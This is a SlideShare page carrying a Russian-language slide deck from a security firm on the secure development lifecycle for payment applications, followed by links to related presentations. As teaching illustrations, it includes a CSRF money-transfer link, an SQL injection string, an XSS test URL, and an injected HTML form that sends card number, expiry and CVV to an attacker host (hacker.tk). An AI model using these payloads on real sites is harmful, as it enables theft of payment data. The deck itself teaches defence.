SlideShare une entreprise Scribd logo

Жизненный цикл безопасной разработки платежных приложений

RISClubSPb
RISClubSPb

http://www.risc.today/

Formation
1  sur  31
Télécharger pour lire hors ligne
© ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Жизненный цикл безопасной разработки программного обеспечения
1-2 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Кристина Андреева Специалист по защите информации компании Deiteriy, CISA, PCI QSA. Семен Уваров Специалист по тестированию на проникновение компании Deiteriy. Спикеры
1-3 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадии жизненного цикла Стадия 1: разработка требований Стадия 2: проектирование Стадия 3: разработка кода Стадия 4: тестирование приложения Стадия 5: перевод в боевую среду Стадия 6: поддержка
1-4 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 1: разработка требований Функциональность должно делать Безопасность не должно делать Аутентификация Перебор пароля Авторизация Лишние права доступа Восстановление пароля Повторное использование ссылки для восстановления пароля Управление сессиями Перехват сессии Передача данных Перехват данных Оплата по банковской карте Использование недействительных данных банковской карты Обработка исключений Вывод полного содержимого ошибки на экран пользователю Протоколирование событий Сохранение в журналах критичных данных Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-5 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Восстановление пароля • одноразовые ссылки; • ограничение на количество запросов восстановления. https://example.ru/user/password/restore?user Id=vasya@gmail.com&code=1625382736 &confirm=768GhtyI787Ght https://example.ru/user/password/restore?user Id=vasya@gmail.com&code=1625382736 &confirm=768GhtyI787Ght https://example.ru/user/password/restore?user Id=vasya@gmail.com&code=1625382736 &confirm=768GhtyI787Ght https://example.ru/user/password/restore?user Id=vasya@gmail.com&code=1625382736 &confirm=768GhtyI787Ght Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-6 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Корректное управление сессиями Bank.ruBank.ru Transfer 10 000 http://bank.ru/ transfermoney?to=….&amount=10000"> Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-7 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Корректное управление сессиями Bank.ruBank.ru • Использование токенов: – уникальные; – непредсказуемые. TOKEN=26022016112045 TOKEN=90c09cad2bb1f7ef863deaf731ee1f21 HTTP request TOKEN=1ghY872…... HTTP respond TOKEN=1ghY872…... Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-8 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com - все данные введены верно. Верификация платежных данных - не позднее текущей даты; - не больше пяти лет. - только цифры; - начинается на 4 и 5; - BIN номера; - алгоритм Луна. - ограничение на количество символов; - три цифры. - все данные введены верно. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-9 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Хранение критичных данных • Маскирование: 1234 56** **** 7890 • Хеширование: – нестойкие: MD5, SHA1 – стойкие: SHA512, Salt • Шифрование: – нестойкие: DES, RC4, XOR – стойкие: AES, 3DES • Токенизация: 81F9D5C87DE03C ! Маскирование + хеширование PAN Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-10 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 2: проектирование Функциональность Безопасность Проектирование архитектуры приложения Проектирование системы защиты приложения Детальное проектирование функций Детальное проектирование функций безопасности Алгоритмы работы Изучение алгоритмов работы и поиск слабых мест Диаграммы: UML, блок-схемы, потоки данных Изучение схемы потоков данных и поиск слабых мест, моделирование угроз безопасности Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-11 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Анализ потоков данных Приложение (2) Вход в систему (1) Регистрация (3) Заказ товара Персональные данные Логин, пароль Пароль для входа Успешно/ошибка Данные заказа Данные карты Успешно/ошибка (5) Третья сторона(5) Третья сторона Данные карты (4) База данных Данные Данные Данные Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-12 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Корректная обработка ошибок • Try … catch Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-13 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Безопасная работа с HTTP-запросами • Использование GET при передаче: – сохраняется в истории браузера. • Заголовки безопасности: – Cache-Control: no-store – Pragma: no-cache – X-Frame-Options: DENY – Strict-Transport-Security: max-age=16070400; includeSubDomains – Content-Security-Policy: default-src ‘self’ Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-14 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Корректное управление доступомГость Пользователь Оператор Администратор Просмотр товаров     Добавление товаров x x x  Покупка товара X  x  Просмотр корзины x    Просмотр пользователей x x   Добавление и изменение пользователей x x x  Журнал транзакций x x   Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-15 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 3: разработка кода • Минимизировать использование небезопасных функций: – PHP: exec(), system(), shell_exec(), passthru() – C++: strcpy(), wsprintf(), _fstrncat() • Использование анти-XSS библиотек: – Microsoft Anti-Cross Site Scripting Library; – снижение производительности. • Использование канонического формата данных: – гггг-мм-дд чч:ми:сс – URL-кодировка. • Избежание конкатенации строк в динамических SQL-запросах: $sql=“SELECT * FROM tab WHERE pass=“+$pass; $pass=1 OR 1=“; Итог: $sql=“SELECT * FROM tab WHERE pass=1 OR 1=1”; Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-16 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Принципы разработки • Эффективное комментирование кода: – читаемость кода; – смена разработчика. • Модульное программирование: – логическая независимость; – один вход и один выход. • Парное программирование: – смена работника. • Работа с памятью. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-17 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Принципы разработки • Защищенное взаимодействие: – отключение 80-го порта; – TLS 1.1 и выше; – Wildcard-сертификаты; • Корректная регистрация событий: – дата и время события; – источник события; – информация о событии. • Контроль целостности кода: – исполняемые файлы; – файлы конфигураций. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-18 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 4: тестирование приложения Написание кода Анализ кода Функциональное тестирование Тестирование по безопасности Успешно? Успешно? Успешно? LДА LДА LДА LНЕТ LНЕТ LНЕТ Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-19 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Анализ кода • визуальный (немного строк): – перекрестная проверка; – отдельный работник; • автоматический (большое количество строк): – коммерческие; – с открытым исходным кодом; – собственная разработка. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-20 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Выявление уязвимостей в коде http://victim.com/test_eval.html#alert(1) Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-21 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Запрет встраивания в код аутентификационных данных Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-22 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Тестирование на безопасность Тестирование на безопасность: • выполнение требований стадии 1: – не делает того, чего делать не должно; • автоматическое сканирование на уязвимости кода: – Web Application (Vulnerability) Scanning; • тестирование на проникновение; • проверка входа и выхода; • фаззинг (случайные данные). Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-23 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Фильтрация всех вводимых и выводимых данных • JavaScript-код: – FirstName = Vvedite PAN<form action="http://hacker.tk/log.php" method="POST"><input type='text‘ • HTML-код: – http://hacker.tk/ref.html?';});</script><html><form action='http://hacker.tk/log.php' method='POST'></br>vvedite PAN<input type='text' name = 'pan'/><br>vvedite expdate<input type=text name='expdate'/><br>vvedite cvv<input type='text' name='cvv'/><input type='submit' name='submit' value = 'Оплатить'/></form></html> • Фильтрация управляющих символов языков JavaScript, HTML и SQL; • Проверка данных на стороне сервера. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-24 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Принципы тестирования • тестовые серверы; • тестовые данные; • разделение сред на канальном, сетевом и прикладном уровне; • разделение полномочий: – тестировщик != программист; – программист != администратор. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-25 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Разделение сред на канальном уровне Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка PRODUCTIVE TESTTEST PRODUCTIVE Internet LogServer 10.250.10.44/30 10.250.10.43/30 10.250.10.13/30 10.250.10.14/30 10.250.30.18/30 10.250.30.17/30 PRODUCTIVE TerminalServer 10.250.10.24/30 10.250.10.23/30 WebSever1 TestServer1
1-26 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 5: перевод в боевую среду • Удаление тестовых данных: – логины и пароли: • test/test, adm/test, user/test. – пользовательские данные и настройки: • test_01@gmail.com, изображения профиля, иные данные. – тестовые данные платежных карт; – тестовые веб-страницы. • Закрытие доступа к служебным страницам: – git, phpinfo(), icons. • Отключение debug-режима: – log.txt: • logon.fx: … id=PaulBonne … passw=15uI_KO90iJe … success • payment.fx: … PAN=45672636145245365 … success Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-27 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 5: перевод в боевую среду • Формирование пакета для развертывания: – file1, file2, file3, todo.txt. • Формирование процедуры отката: – Если … то … • Анализ логов на предмет ошибок. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-28 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Стадия 6: поддержка • Сканирование сетевой инфраструктуры: – внутреннее; – внешнее. • Тестирование на проникновение: – внутреннее; – внешнее. • Регулярное обновление инфраструктуры; • Отслеживание уязвимостей; • Регулярный анализ логов; • Формирование заданий на доработку. Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-29 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Изменение кодаЗапрос на изменение кода Успешно? Разработка кода изменения Анализ кода Функциональное тестирование Успешно? Включение в релиз Функциональное тестирование релиза Тестирование релиза на безопасность Формирование пакета обновления, заявка на обновление релиза, процедура отката НЕТ ДА ДА Успешно? НЕТ ДА Успешно? Исключение изменения из релиза НЕТ НЕТ ДА Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
1-30 Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Резюме Стадии Функциональность Безопасность Разработка требований Функциональность, переносимость, технология Требования к безопасности Проектирование Архитектура, функции, потоки данных Моделирование функций безопасности, моделирование угроз Разработка кода Функциональное тестирование, тестовые данные Анализ кода, тестирование на безопасностьТестирование приложения Перевод в боевую среду Удаление тестовых данных, процедура отката Поддержка Написание новых модулей Соблюдение цикла безопасной разработки Стадия 1: Разработка требований Стадия 2: Проектирование Стадия 3: Разработка кода Стадия 4: Тестирование приложения Стадия 5: Перевод в боевую среду Стадия 6: Поддержка
Жизненный цикл безопасной разработки программного обеспечения © ООО «Дейтерий», 2010 – 2016 | 192012, Россия, Санкт-Петербург, пр. Обуховской Обороны д. 271, лит. А | +7 (812) 361-61-55 | www.deiteriy.com | info@deiteriy.com Контакты • kristina.andreeva@deiteriy.com • simon.uvarov@deiteriy.com 1-31

Recommandé

Цикл безопасной разработки
Цикл безопасной разработкиЦикл безопасной разработки
Цикл безопасной разработки
RISClubSPb
 
Безопасная разработка приложений на практике
Безопасная разработка приложений на практикеБезопасная разработка приложений на практике
Безопасная разработка приложений на практике
Pointlane
 
Разработка ПО в рамках PCI DSS
Разработка ПО в рамках PCI DSSРазработка ПО в рамках PCI DSS
Разработка ПО в рамках PCI DSS
Alex Babenko
 
Безопасность и сертификация банковского ПО
Безопасность и сертификация банковского ПОБезопасность и сертификация банковского ПО
Безопасность и сертификация банковского ПО
Alex Babenko
 
О PCI P2PE в общих чертах
О PCI P2PE в общих чертахО PCI P2PE в общих чертах
О PCI P2PE в общих чертах
Alex Babenko
 
Обеспечение качества ПО: международный опыт
Обеспечение качества ПО: международный опытОбеспечение качества ПО: международный опыт
Обеспечение качества ПО: международный опыт
Aleksey Lukatskiy
 
Алексей Лукацкий. SDLC – блажь, веяние моды или требование регуляторов?
Алексей Лукацкий. SDLC – блажь, веяние моды или требование регуляторов?Алексей Лукацкий. SDLC – блажь, веяние моды или требование регуляторов?
Алексей Лукацкий. SDLC – блажь, веяние моды или требование регуляторов?
Positive Hack Days
 
ЛОМАТЬ И СТРОИТЬ, И СНОВА ЛОМАТЬ
ЛОМАТЬ И СТРОИТЬ, И СНОВА ЛОМАТЬЛОМАТЬ И СТРОИТЬ, И СНОВА ЛОМАТЬ
ЛОМАТЬ И СТРОИТЬ, И СНОВА ЛОМАТЬ
Positive Hack Days
 

Recommandé

Цикл безопасной разработки
Цикл безопасной разработкиЦикл безопасной разработки
Цикл безопасной разработки
RISClubSPb
 
Безопасная разработка приложений на практике
Безопасная разработка приложений на практикеБезопасная разработка приложений на практике
Безопасная разработка приложений на практике
Pointlane
 
Разработка ПО в рамках PCI DSS
Разработка ПО в рамках PCI DSSРазработка ПО в рамках PCI DSS
Разработка ПО в рамках PCI DSS
Alex Babenko
 
Безопасность и сертификация банковского ПО
Безопасность и сертификация банковского ПОБезопасность и сертификация банковского ПО
Безопасность и сертификация банковского ПО
Alex Babenko
 
О PCI P2PE в общих чертах
О PCI P2PE в общих чертахО PCI P2PE в общих чертах
О PCI P2PE в общих чертах
Alex Babenko
 
Обеспечение качества ПО: международный опыт
Обеспечение качества ПО: международный опытОбеспечение качества ПО: международный опыт
Обеспечение качества ПО: международный опыт
Aleksey Lukatskiy
 
Алексей Лукацкий. SDLC – блажь, веяние моды или требование регуляторов?
Алексей Лукацкий. SDLC – блажь, веяние моды или требование регуляторов?Алексей Лукацкий. SDLC – блажь, веяние моды или требование регуляторов?
Алексей Лукацкий. SDLC – блажь, веяние моды или требование регуляторов?
Positive Hack Days
 
ЛОМАТЬ И СТРОИТЬ, И СНОВА ЛОМАТЬ
ЛОМАТЬ И СТРОИТЬ, И СНОВА ЛОМАТЬЛОМАТЬ И СТРОИТЬ, И СНОВА ЛОМАТЬ
ЛОМАТЬ И СТРОИТЬ, И СНОВА ЛОМАТЬ
Positive Hack Days
 
Ломать и строить. PHDays 2015
Ломать и строить. PHDays 2015Ломать и строить. PHDays 2015
Ломать и строить. PHDays 2015
Alexey Kachalin
 
Разработка средств защиты в России и на Западе: разность подходов
Разработка средств защиты в России и на Западе: разность подходовРазработка средств защиты в России и на Западе: разность подходов
Разработка средств защиты в России и на Западе: разность подходов
Aleksey Lukatskiy
 
пр 03.JSOC inside
пр 03.JSOC insideпр 03.JSOC inside
пр 03.JSOC inside
Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001
 
Alexander Dmitriev - Практика построения ключевых процессов менеджмента инфор...
Alexander Dmitriev - Практика построения ключевых процессов менеджмента инфор...Alexander Dmitriev - Практика построения ключевых процессов менеджмента инфор...
Alexander Dmitriev - Практика построения ключевых процессов менеджмента инфор...
UISGCON
 
Внедрение безопасной разработки (Infosecurity 2014)
Внедрение безопасной разработки (Infosecurity 2014)Внедрение безопасной разработки (Infosecurity 2014)
Внедрение безопасной разработки (Infosecurity 2014)
Alexey Kachalin
 
пр 5 почему аутсорсинга ИБ
пр 5 почему аутсорсинга ИБпр 5 почему аутсорсинга ИБ
пр 5 почему аутсорсинга ИБ
Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001
 
Контроль уязвимостей в программных приложениях
Контроль уязвимостей в программных приложенияхКонтроль уязвимостей в программных приложениях
Контроль уязвимостей в программных приложениях
jet_information_security
 
Киберучения по ИБ для топ-менеджмента
Киберучения по ИБ для топ-менеджментаКиберучения по ИБ для топ-менеджмента
Киберучения по ИБ для топ-менеджмента
Aleksey Lukatskiy
 
Измерение эффективности SOC. 3 года спустя
Измерение эффективности SOC. 3 года спустяИзмерение эффективности SOC. 3 года спустя
Измерение эффективности SOC. 3 года спустя
Aleksey Lukatskiy
 
Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...
Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...
Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...
KazHackStan
 
Моделирование угроз 2.0
Моделирование угроз 2.0Моделирование угроз 2.0
Моделирование угроз 2.0
Aleksey Lukatskiy
 
Валерий Блонский (Казахстан), PACIFICA. Как угнать Ботнет
Валерий Блонский (Казахстан), PACIFICA. Как угнать БотнетВалерий Блонский (Казахстан), PACIFICA. Как угнать Ботнет
Валерий Блонский (Казахстан), PACIFICA. Как угнать Ботнет
KazHackStan
 
Измерение эффективности ИБ промышленных систем
Измерение эффективности ИБ промышленных системИзмерение эффективности ИБ промышленных систем
Измерение эффективности ИБ промышленных систем
Aleksey Lukatskiy
 
Дашборды по ИБ для топ-менеджмента
Дашборды по ИБ для топ-менеджментаДашборды по ИБ для топ-менеджмента
Дашборды по ИБ для топ-менеджмента
Aleksey Lukatskiy
 
Обнаружение необнаруживаемого
Обнаружение необнаруживаемогоОбнаружение необнаруживаемого
Обнаружение необнаруживаемого
Aleksey Lukatskiy
 
Кибербезопасность с точки зрения директоров
Кибербезопасность с точки зрения директоровКибербезопасность с точки зрения директоров
Кибербезопасность с точки зрения директоров
Cisco Russia
 
Информационная безопасность
Информационная безопасностьИнформационная безопасность
Информационная безопасность
КРОК
 
Аутсорсинг. Управление рисками информационной безопасности
Аутсорсинг. Управление рисками информационной безопасностиАутсорсинг. Управление рисками информационной безопасности
Аутсорсинг. Управление рисками информационной безопасности
Aleksey Lukatskiy
 
SearchInform. Сергей Ананич. "Нестандартные методы применения DLP-систем в би...
SearchInform. Сергей Ананич. "Нестандартные методы применения DLP-систем в би...SearchInform. Сергей Ананич. "Нестандартные методы применения DLP-систем в би...
SearchInform. Сергей Ананич. "Нестандартные методы применения DLP-систем в би...
Expolink
 
Безопаность SAP-систем
Безопаность SAP-системБезопаность SAP-систем
Безопаность SAP-систем
Alexey Kachalin
 
Коучинговые методики в менеджменте и личной эффективности
Коучинговые методики в менеджменте и личной эффективностиКоучинговые методики в менеджменте и личной эффективности
Коучинговые методики в менеджменте и личной эффективности
RISClubSPb
 
Человек и смартфон. Друзья или враги!?
Человек и смартфон. Друзья или враги!?Человек и смартфон. Друзья или враги!?
Человек и смартфон. Друзья или враги!?
RISClubSPb
 

Contenu connexe

Tendances

Ломать и строить. PHDays 2015
Ломать и строить. PHDays 2015Ломать и строить. PHDays 2015
Ломать и строить. PHDays 2015
Alexey Kachalin
 
Alexander Dmitriev - Практика построения ключевых процессов менеджмента инфор...
Alexander Dmitriev - Практика построения ключевых процессов менеджмента инфор...Alexander Dmitriev - Практика построения ключевых процессов менеджмента инфор...
Alexander Dmitriev - Практика построения ключевых процессов менеджмента инфор...
UISGCON
 
Контроль уязвимостей в программных приложениях
Контроль уязвимостей в программных приложенияхКонтроль уязвимостей в программных приложениях
Контроль уязвимостей в программных приложениях
jet_information_security
 
Кибербезопасность с точки зрения директоров
Кибербезопасность с точки зрения директоровКибербезопасность с точки зрения директоров
Кибербезопасность с точки зрения директоров
Cisco Russia
 

Tendances (20)

Ломать и строить. PHDays 2015
Ломать и строить. PHDays 2015Ломать и строить. PHDays 2015
Ломать и строить. PHDays 2015
 
Разработка средств защиты в России и на Западе: разность подходов
Разработка средств защиты в России и на Западе: разность подходовРазработка средств защиты в России и на Западе: разность подходов
Разработка средств защиты в России и на Западе: разность подходов
 
пр 03.JSOC inside
пр 03.JSOC insideпр 03.JSOC inside
пр 03.JSOC inside
 
Alexander Dmitriev - Практика построения ключевых процессов менеджмента инфор...
Alexander Dmitriev - Практика построения ключевых процессов менеджмента инфор...Alexander Dmitriev - Практика построения ключевых процессов менеджмента инфор...
Alexander Dmitriev - Практика построения ключевых процессов менеджмента инфор...
 
Внедрение безопасной разработки (Infosecurity 2014)
Внедрение безопасной разработки (Infosecurity 2014)Внедрение безопасной разработки (Infosecurity 2014)
Внедрение безопасной разработки (Infosecurity 2014)
 
пр 5 почему аутсорсинга ИБ
пр 5 почему аутсорсинга ИБпр 5 почему аутсорсинга ИБ
пр 5 почему аутсорсинга ИБ
 
Контроль уязвимостей в программных приложениях
Контроль уязвимостей в программных приложенияхКонтроль уязвимостей в программных приложениях
Контроль уязвимостей в программных приложениях
 
Киберучения по ИБ для топ-менеджмента
Киберучения по ИБ для топ-менеджментаКиберучения по ИБ для топ-менеджмента
Киберучения по ИБ для топ-менеджмента
 
Измерение эффективности SOC. 3 года спустя
Измерение эффективности SOC. 3 года спустяИзмерение эффективности SOC. 3 года спустя
Измерение эффективности SOC. 3 года спустя
 
Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...
Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...
Валерий Боронин (Россия), Positive Technologies. SSDL для руководителей: как ...
 
Моделирование угроз 2.0
Моделирование угроз 2.0Моделирование угроз 2.0
Моделирование угроз 2.0
 
Валерий Блонский (Казахстан), PACIFICA. Как угнать Ботнет
Валерий Блонский (Казахстан), PACIFICA. Как угнать БотнетВалерий Блонский (Казахстан), PACIFICA. Как угнать Ботнет
Валерий Блонский (Казахстан), PACIFICA. Как угнать Ботнет
 
Измерение эффективности ИБ промышленных систем
Измерение эффективности ИБ промышленных системИзмерение эффективности ИБ промышленных систем
Измерение эффективности ИБ промышленных систем
 
Дашборды по ИБ для топ-менеджмента
Дашборды по ИБ для топ-менеджментаДашборды по ИБ для топ-менеджмента
Дашборды по ИБ для топ-менеджмента
 
Обнаружение необнаруживаемого
Обнаружение необнаруживаемогоОбнаружение необнаруживаемого
